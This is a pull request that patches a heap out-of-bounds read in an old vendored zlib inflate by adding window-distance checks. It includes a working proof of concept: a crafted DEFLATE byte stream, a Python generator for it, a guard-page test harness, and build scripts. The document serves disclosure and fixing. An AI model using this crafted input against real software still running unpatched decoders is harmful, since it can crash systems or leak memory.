### PR TITLE
zlib: heap OOB read in inflate via missing distance bounds check

### DIFF
--- a/sys/net/zlib.c
+++ b/sys/net/zlib.c
@@ -4818,6 +4818,17 @@ inflate_codes(inflate_blocks_statef *s, z_streamp z, int r)
       c->sub.copy.dist += (uInt)b & inflate_mask[j];
       DUMPBITS(j)
       Tracevv((stderr, "inflate:         distance %u\n", c->sub.copy.dist));
+      /* Reject distances that exceed the sliding window. The
+       * back-reference can only ever reach inside [s->window, s->end);
+       * a decoded distance larger than the window is an attempt to read
+       * memory before the allocation. Modern zlib checks dist <= dmax. */
+      if (c->sub.copy.dist > (uInt)(s->end - s->window))
+      {
+        z->msg = (char *)"invalid distance too far back";
+        c->mode = BADCODE;
+        r = Z_DATA_ERROR;
+        LEAVE
+      }
       c->mode = COPY;
     case COPY:          /* o: copying bytes in window, waiting for space */
 #ifndef __TURBOC__ /* Turbo C bug for following expression */
@@ -5061,6 +5072,17 @@ inflate_fast(uInt bl, uInt bd, inflate_huft *tl, inflate_huft *td,
             d = t->base + ((uInt)b & inflate_mask[e]);
             DUMPBITS(e)
             Tracevv((stderr, "inflate:         * distance %u\n", d));
+
+            /* Reject distances that exceed the sliding window
+             * (mirror of the inflate_codes check above). Without this,
+             * the copy below dereferences memory before s->window. */
+            if (d > (uInt)(s->end - s->window))
+            {
+              z->msg = (char *)"invalid distance too far back";
+              UNGRAB
+              UPDATE
+              return Z_DATA_ERROR;
+            }
 
             /* do the copy */
             m -= c;


### PR DESCRIPTION
# zlib: heap OOB read in inflate via missing distance bounds check

`sys/net/zlib.c` is a vendored copy of zlib 1.0.4 (FILEVERSION 971210). Its `inflate_codes` COPY case (`inflate_codes()`, ~line 4822) and `inflate_fast` (~line 5073) resolve a back-reference by pointer arithmetic against the sliding window without ever checking that the decoded distance fits in the window, so `s->end - (dist - (q - s->window))` can underflow past `s->window`. When the stream is decoded with `windowBits < 15` (a window smaller than the 32 KiB a DEFLATE distance code can express), a crafted raw stream carrying a distance larger than the window makes inflate read heap memory adjacent to the window allocation. Modern zlib rejects this with a `dist > dmax` / `whave` check; this copy predates it. The only in-tree caller that opens inflate with `windowBits < 15` is `ng_deflate` (netgraph7), which is not built into `X86_64_GENERIC`, so the bug is currently latent in the default config; `mxge` uses `inflateInit` (window 15) and is safe. The fix is still warranted for the vendored copy the moment `ng_deflate` is loaded or any future caller uses a sub-15 window.

## Fix

Reject decoded distances larger than the window in both `inflate_codes` (COPY) and `inflate_fast`, mirroring modern zlib: if `dist > s->end - s->window`, set `z->msg = "invalid distance too far back"` and return `Z_DATA_ERROR`.

## Before / after

A userspace harness links the verbatim `sys/net/zlib.c` (the file this PR changes) and wraps every zlib allocation in a `PROT_NONE` guard page, so an underflow past the sliding window faults. Default run uses `windowBits=-8` (256-byte window).

`#0 unpatched` (verbatim `sys/net/zlib.c`), `windowBits=-8`:

```
[harness] using windowBits=-8 (256-byte window)
[harness] calling inflate on 551-byte stream, window=256 bytes...
[harness] *** SIGSEGV/SIGBUS during inflate at 0x800480f01 ***
[harness] nearest alloc #2 [user=0x800481000 size=256]: fault is -255 bytes (BEFORE-start (underflow into guard page))
[harness] RESULT: OOB READ CONFIRMED
```

Control `windowBits=-15` (32 KiB window swallows the distance): `inflate returned Z_STREAM_END, total_out=916`, no fault.

`#1 patched` (`zlib.c` + this fix), `windowBits=-8` (the previously-OOB case):

```
[harness] calling inflate on 551-byte stream, window=256 bytes...
[harness] inflate returned -3, msg=invalid distance too far back, total_out=659
[harness] RESULT: no OOB fault observed
```

`windowBits=-15` still returns `Z_STREAM_END, total_out=916` (no regression); the `-8` case is deterministic across 3 runs.

## Reproducer

The harness compiles `sys/net/zlib.c` unchanged in userspace mode and drives it with a crafted raw-DEFLATE stream (regenerable via `gen_stream.py`). Copy `sys/net/zlib.c` and `sys/net/zlib.h` from the tree into this directory alongside the files below.

`harness.c`:

```c
/*
 * PoC harness: heap OOB read in ancient zlib 1.0.4 inflate when
 * windowBits < 15. Links the EXACT, UNMODIFIED sys/net/zlib.c (copied
 * verbatim into this folder) and exercises it as a userspace library,
 * which is valid because the file is written to compile cleanly in three
 * modes (_KERNEL / __KERNEL__ / userspace) and contains the identical
 * inflate distance-handling code that compiles into the kernel.
 *
 * Attack model: a raw DEFLATE stream (nowrap=1, the mode used by
 * netgraph7_deflate via inflateInit2(&cx, -windowBits)) decoded with a
 * small window (windowBits < 15) can carry distance codes up to 32768,
 * but the 1.0.4 inflate_codes/inflate_fast COPY cases perform NO
 * "dist <= window" check. The resulting pointer arithmetic
 *     s->end - (dist - (q - s->window))
 * underflows past s->window and reads adjacent heap memory.
 *
 * This harness proves the OOB read by placing a PROT_NONE guard page
 * immediately BEFORE every zlib allocation; the underflow touches the
 * guard page in front of the sliding window and faults.
 *
 * Build: see build.sh   Run: see run.sh
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <setjmp.h>
#include <sys/mman.h>
#include <unistd.h>

#include "zlib.h"   /* the verbatim sys/net/zlib.h */

/* ---- the crafted raw-DEFLATE stream ------------------------------ *
 * Generated on the host with Python's zlib at windowBits=-15 (32KiB
 * encoder window) from data engineered so the only available match for
 * the second copy of a 258-byte pseudo-random pattern is more than 256
 * bytes back. zlib's encoder therefore MUST emit a distance code > 256.
 * Raw stream (no zlib header), so a decoder opened with inflateInit2(-8)
 * will accept the block and try to resolve that large distance against
 * its 256-byte window. See gen_stream.py for how these bytes are made.
 */
static const unsigned char STREAM[] = {
  0x13,0x9c,0x22,0x3e,0x4b,0x76,0x81,0xf2,0x32,0xcd,0x35,0xfa,0x9b,0x4c,0x77,0x58,
  0xef,0x73,0x3c,0xe2,0x7e,0xca,0xf7,0x42,0xf0,0xb5,0xc8,0x3b,0xf1,0x8f,0x52,0x5f,
  0x64,0xbf,0x2b,0xfc,0x52,0xfe,0xab,0x96,0xa1,0x99,0xad,0x93,0xa7,0x5f,0x68,0xaa,
  0xc4,0x6c,0xb9,0x85,0x2a,0xcb,0xb5,0xd6,0x1a,0x6c,0x36,0xdb,0x69,0xb3,0xdf,0xe9,
  0xa8,0xc7,0x69,0xbf,0x8b,0x21,0xd7,0xa3,0xee,0x26,0x3c,0x4e,0x7b,0x99,0xf3,0xbe,
  0xe8,0x6b,0xc5,0xef,0x3a,0xc6,0x16,0xf6,0x2e,0xde,0x09,0xc2,0xd3,0x24,0xe7,0xc8,
  0x2f,0x52,0x5d,0xa1,0xbd,0xce,0x70,0x8b,0xf9,0x2e,0xdb,0x03,0xce,0xc7,0x3c,0xcf,
  0xf8,0x5f,0x0a,0xbd,0x11,0x7d,0x2f,0xf1,0x49,0xfa,0xab,0xdc,0x0f,0xc5,0xdf,0x2a,
  0xff,0xd4,0x33,0xb5,0x72,0x74,0xf3,0x4d,0x14,0x99,0x2e,0x35,0x57,0x61,0xb1,0xda,
  0x4a,0x9d,0xf5,0x46,0x5b,0x2d,0x76,0xdb,0x1d,0x74,0x39,0xee,0x75,0x36,0xe0,0x72,
  0xd8,0xcd,0x98,0xfb,0x49,0x4f,0x33,0x5e,0xe7,0x7d,0x2c,0xf9,0x5e,0xf5,0xb7,0x81,
  0xb9,0x8d,0xb3,0x87,0x7f,0x92,0xe8,0x0c,0xe9,0x79,0x8a,0x4b,0xd4,0x57,0xe9,0x6e,
  0x30,0xde,0x66,0xb9,0xc7,0xfe,0x90,0xeb,0x09,0xef,0x73,0x81,0x57,0xc2,0x6f,0xc5,
  0x3e,0x48,0x7e,0x96,0xf9,0x26,0xff,0x53,0xe9,0x8f,0xea,0x7f,0x8d,0x2c,0xed,0x5c,
  0xbd,0x02,0x93,0xc5,0x66,0xca,0xcc,0x57,0x5a,0xaa,0xb1,0x5a,0x6f,0xa3,0xc9,0x76,
  0xab,0xbd,0x0e,0x87,0xdd,0x4e,0xfa,0x9c,0x0f,0xba,0x1a,0x71,0x3b,0xee,0x61,0xca,
  0xf3,0xac,0xb7,0x05,0x9f,0xcb,0x7e,0xd6,0xfc,0x6f,0x62,0xed,0xe0,0xee,0x13,0x9c,
  0xe2,0x5e,0xb3,0xf1,0x99,0x74,0x40,0xeb,0xae,0xf7,0x2a,0x91,0x7d,0x87,0x7f,0xe8,
  0x26,0x4d,0x3f,0xc3,0x68,0x96,0xbd,0xe0,0x2a,0x97,0x7d,0xc9,0xca,0x7b,0xc2,0x1e,
  0xb5,0x9b,0x9e,0xcb,0x04,0xb6,0xed,0xfe,0xa0,0x1a,0xd5,0x7f,0xe4,0xa7,0x5e,0xf2,
  0x8c,0xb3,0x4c,0xe6,0x39,0x0b,0xaf,0x71,0x3b,0x94,0xae,0xba,0x2f,0xe2,0x59,0xb7,
  0xf9,0x85,0x6c,0x50,0xfb,0x9e,0x8f,0x6a,0xd1,0x13,0x8e,0xfe,0xd2,0x4f,0x99,0x79,
  0x8e,0xd9,0x22,0x77,0xd1,0x75,0x1e,0xc7,0xb2,0xd5,0x0f,0x44,0xbd,0xea,0xb7,0xbc,
  0x94,0x0b,0xee,0xd8,0xfb,0x49,0x3d,0x66,0xe2,0xb1,0xdf,0x06,0xa9,0xb3,0xce,0xb3,
  0x58,0xe6,0x2d,0xbe,0xc1,0xeb,0x54,0xbe,0xe6,0xa1,0x98,0x77,0xc3,0xd6,0x57,0xf2,
  0x21,0x9d,0xfb,0x3e,0x6b,0xc4,0x4e,0x3a,0xfe,0xc7,0x30,0x6d,0xf6,0x05,0x56,0xab,
  0xfc,0x25,0x37,0xf9,0x9c,0x2b,0xd6,0x3e,0x12,0xf7,0x69,0xdc,0xf6,0x5a,0x21,0xb4,
  0x6b,0xff,0x17,0xcd,0xb8,0xc9,0x27,0xfe,0x1a,0xa5,0xcf,0xb9,0xc8,0x66,0x5d,0xb0,
  0xf4,0x16,0xbf,0x4b,0xe5,0xba,0xc7,0x12,0xbe,0x4d,0xdb,0xdf,0x28,0x86,0x75,0x1f,
  0xf8,0xaa,0x15,0x3f,0xe5,0xe4,0x3f,0xe3,0x8c,0xb9,0x97,0xd8,0x6d,0x0a,0x97,0xdd,
  0x16,0x70,0xad,0x5a,0xff,0x44,0xd2,0xaf,0x79,0xc7,0x5b,0xa5,0xf0,0x9e,0x83,0xdf,
  0xb4,0x13,0xa6,0x9e,0xfa,0x6f,0x92,0x39,0xef,0x32,0x87,0x6d,0xd1,0xf2,0x3b,0x82,
  0x6e,0xd5,0x1b,0x9e,0x4a,0xf9,0xb7,0xec,0x7c,0xa7,0x1c,0xd1,0x7b,0xe8,0xbb,0x4e,
  0xe2,0xb4,0xd3,0x0c,0xa6,0x59,0xf3,0xaf,0x70,0xda,0x15,0xaf,0xb8,0x2b,0x34,0xd8,
  0xfc,0x2f,0x38,0xe2,0x53,0x24,0x00,
};
static const size_t STREAM_LEN = sizeof(STREAM);  /* = 551 */

/* ---- guard-page allocator to surface the underflow ---------------- */
static long g_pagesize;

#define MAX_ALLOCS 64
struct alloc_rec {
    unsigned char *mmap_base;   /* mmap region start (guard page lives here) */
    size_t         mmap_len;
    unsigned char *user;        /* pointer returned to zlib (mmap_base + page) */
    size_t         size;        /* requested size */
};
static struct alloc_rec g_allocs[MAX_ALLOCS];
static int              g_nallocs = 0;

voidpf zcalloc(voidpf opaque, unsigned items, unsigned size)
{
    size_t total = (size_t)items * (size_t)size;
    size_t need  = (total + g_pagesize - 1) & ~((size_t)g_pagesize - 1);
    size_t maplen = g_pagesize + need;                 /* guard page + payload */
    void *m = mmap(NULL, maplen, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANON, -1, 0);
    if (m == MAP_FAILED) return NULL;
    if (mprotect(m, g_pagesize, PROT_NONE) != 0) {     /* poison the guard page */
        munmap(m, maplen);
        return NULL;
    }
    if (g_nallocs < MAX_ALLOCS) {
        g_allocs[g_nallocs].mmap_base = (unsigned char *)m;
        g_allocs[g_nallocs].mmap_len  = maplen;
        g_allocs[g_nallocs].user      = (unsigned char *)m + g_pagesize;
        g_allocs[g_nallocs].size      = total;
        g_nallocs++;
    }
    (void)opaque;
    return (voidpf)((unsigned char *)m + g_pagesize);
}

void zcfree(voidpf opaque, voidpf ptr)
{
    /* Short-lived process; let the OS reclaim at exit so we can still
     * inspect the allocations in the signal handler. */
    (void)opaque; (void)ptr;
}

/* ---- SIGSEGV catch ------------------------------------------------ */
static sigjmp_buf g_jmp;
static void      *g_fault_addr;
static int        g_faulted;

static void on_sig(int sig, siginfo_t *si, void *uc)
{
    (void)sig; (void)uc;
    g_fault_addr = si->si_addr;
    g_faulted = 1;
    siglongjmp(g_jmp, 1);
}

static const char *classify(unsigned char *fault)
{
    static char buf[256];
    int best = -1;
    long bestoff = 0;
    for (int i = 0; i < g_nallocs; i++) {
        long off = (long)fault - (long)g_allocs[i].user;
        if (best < 0 || labs(off) < labs(bestoff)) {
            best = i; bestoff = off;
        }
    }
    if (best < 0) {
        snprintf(buf, sizeof(buf), "fault %p matched no tracked allocation", (void *)fault);
        return buf;
    }
    const char *where = (bestoff < 0) ? "BEFORE-start (underflow into guard page)"
                                      : ((size_t)bestoff < g_allocs[best].size
                                         ? "inside-allocation" : "AFTER-end");
    snprintf(buf, sizeof(buf),
             "nearest alloc #%d [user=%p size=%zu (%#zx)]: fault is %+ld bytes (%s)",
             best, (void *)g_allocs[best].user, g_allocs[best].size, g_allocs[best].size,
             bestoff, where);
    return buf;
}

int main(int argc, char **argv)
{
    setvbuf(stderr, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    write(2, "[harness] started\n", 18);
    g_pagesize = sysconf(_SC_PAGESIZE);
    if (g_pagesize <= 0) g_pagesize = 4096;
    fprintf(stderr, "[harness] pagesize=%ld\n", g_pagesize);

    struct sigaction sa;
    memset(&sa, 0, sizeof(sa));
    sa.sa_sigaction = on_sig;
    sa.sa_flags = SA_SIGINFO;
    sigemptyset(&sa.sa_mask);
    sigaction(SIGSEGV, &sa, NULL);
    sigaction(SIGBUS,  &sa, NULL);

    z_stream zs;
    memset(&zs, 0, sizeof(zs));
    /* Optional argv[1]: windowBits (default -8, the vulnerable small-window
     * case). Negative => raw DEFLATE (netgraph7_deflate mode). Use -15 for
     * the control: 32KiB window swallows the distance and no OOB occurs. */
    int wb = (argc > 1) ? atoi(argv[1]) : -8;
    fprintf(stderr, "[harness] using windowBits=%d (|%d|-byte window)\n", wb,
            wb < 0 ? (1 << (-wb)) : (1 << wb));
    /* zlib.c defines NO_ZCFUNCS, so inflateInit2_ does NOT install a default
     * allocator; the caller must wire up zalloc/zfree, exactly as every
     * kernel caller does. Point them at our guard-page zcalloc. */
    zs.zalloc = zcalloc;
    zs.zfree  = zcfree;

    int r = inflateInit2(&zs, wb);
    fprintf(stderr, "[harness] inflateInit2 returned %d\n", r);
    if (r != Z_OK) {
        fprintf(stderr, "inflateInit2(%d) failed: %d (%s)\n", wb, r, zs.msg);
        return 2;
    }

    fprintf(stderr, "[harness] %d allocations made by inflateInit2:\n", g_nallocs);
    for (int i = 0; i < g_nallocs; i++)
        fprintf(stderr, "  #%d user=%p size=%zu (%#zx)\n", i,
                (void *)g_allocs[i].user, g_allocs[i].size, g_allocs[i].size);

    unsigned char out[65536];
    zs.next_in   = (Bytef *)STREAM;
    zs.avail_in  = STREAM_LEN;
    zs.next_out  = out;
    zs.avail_out = sizeof(out);

    g_faulted = 0;
    fprintf(stderr, "[harness] calling inflate on %zu-byte stream, window=%d bytes...\n",
            STREAM_LEN, wb < 0 ? (1 << (-wb)) : (1 << wb));
    if (sigsetjmp(g_jmp, 1) == 0) {
        r = inflate(&zs, Z_FINISH);
        fprintf(stderr, "[harness] inflate returned %d, msg=%s, total_out=%lu\n",
                r, zs.msg ? zs.msg : "(null)", (unsigned long)zs.total_out);
        inflateEnd(&zs);
        fprintf(stderr, "[harness] RESULT: no OOB fault observed on this stream "
                        "(stream may carry no dist>windowBits, or OOB landed in "
                        "the readable slack of a non-window allocation)\n");
        return 0;
    } else {
        fprintf(stderr, "[harness] *** SIGSEGV/SIGBUS during inflate at %p ***\n",
                g_fault_addr);
        fprintf(stderr, "[harness] %s\n", classify((unsigned char *)g_fault_addr));
        fprintf(stderr, "[harness] RESULT: OOB READ CONFIRMED -- inflate dereferenced "
                        "memory outside an allocation (the sliding-window distance "
                        "bounds check is absent in sys/net/zlib.c 1.0.4)\n");
        return 1;
    }
}
```

`gen_stream.py` (host-side; how the crafted raw-DEFLATE `STREAM` above was produced):

```python
#!/usr/bin/env python3
# How the crafted raw-DEFLATE stream embedded in harness.c was produced.
# Run on the host (the DragonFly guest has no python):
#   python3 gen_stream.py
#
# Strategy: compress with a 32KiB encoder window (windowBits=-15) so the
# encoder is free to emit distance codes up to 32768. Engineer the input
# so the ONLY match available for the second copy of a long pseudo-random
# pattern is more than 256 bytes back, forcing the encoder to emit a
# distance > 256. The resulting raw stream, fed to a decoder opened with
# inflateInit2(-8) (256-byte window), triggers the missing distance-bounds
# check in sys/net/zlib.c 1.0.4.
import zlib

pat = bytes((i * 131 + 17) & 0xff for i in range(258))   # 258-byte unique pattern (max match len)
gap = b'\x00'
data = pat + gap + pat                                    # 2nd pat: nearest match at distance 259

co = zlib.compressobj(9, zlib.DEFLATED, -15)             # raw, 32K window
stream = co.compress(data) + co.flush()

# sanity: round-trips with a 32K window
d = zlib.decompressobj(-15); rt = d.decompress(stream) + d.flush()
assert rt == data, "round-trip mismatch with encoder window"

print("orig_len", len(data))
print("stream_len", len(stream))
print("HEX", stream.hex())
print("C  ", "{" + ",".join("0x%02x" % b for b in stream) + "};  // len=%d" % len(stream))
```

`kshim.h` (userspace shims so the unmodified kernel `zlib.c` builds in userspace; injected via `cc -include kshim.h`):

```c
/* Userspace shims so the EXACT, UNMODIFIED sys/net/zlib.c (which is written
 * for _KERNEL compilation) also builds in userspace. Injected via
 * `cc -include kshim.h`. We do NOT edit zlib.c; this header only supplies
 * the few kernel-only tokens zlib.c references at file scope (the trailing
 * MODULE_VERSION module-macro and the MAX macro from <sys/param.h>). None
 * of these touch the inflate distance-handling code under test. */
#ifndef KSHIM_H
#define KSHIM_H

#ifndef MAX
#define MAX(a,b) (((a) > (b)) ? (a) : (b))
#endif
#ifndef MIN
#define MIN(a,b) (((a) < (b)) ? (a) : (b))
#endif

/* kernel module-macros -> no-ops in userspace */
#define MODULE_VERSION(name, ver)
#define MODULE_DEPEND(name, mod, vmaj, vmin, vpatch)
#define MODULE_DECL(name)
#define DECLARE_MODULE(name, data, sub, order)

#endif
```

`build.sh`:

```sh
#!/bin/sh
# Compile the harness, linking the EXACT sys/net/zlib.c (verbatim copy in
# this folder) as a userspace library. zlib.c compiles in userspace mode
# (it #includes "zlib.h" when _KERNEL is not defined); the harness supplies
# zcalloc/zcfree.
set -e
cd "$(dirname "$0")"
echo "+ cc -O2 -Wall -include kshim.h -o harness harness.c zlib.c"
cc -O2 -Wall -include kshim.h -o harness harness.c zlib.c
echo "BUILD_EXIT=$?"
ls -l harness
```

`run.sh`:

```sh
#!/bin/sh
# Default (no arg) uses windowBits=-8, the vulnerable small-window case: a
# SIGSEGV/SIGBUS during inflate (reported by the harness) proves the heap
# OOB read in sys/net/zlib.c. Pass "-15" for the control (32KiB window
# swallows the distance, no OOB).
cd "$(dirname "$0")"
./harness "$@"
echo "RUN_EXIT=$?"
```

Build and run:

```
cp /usr/src/sys/net/zlib.c /usr/src/sys/net/zlib.h .     # verbatim from the tree
sh ./build.sh
sh ./run.sh              # windowBits=-8: SIGSEGV on unpatched, Z_DATA_ERROR on patched
sh ./run.sh -15          # control: Z_STREAM_END either way
```
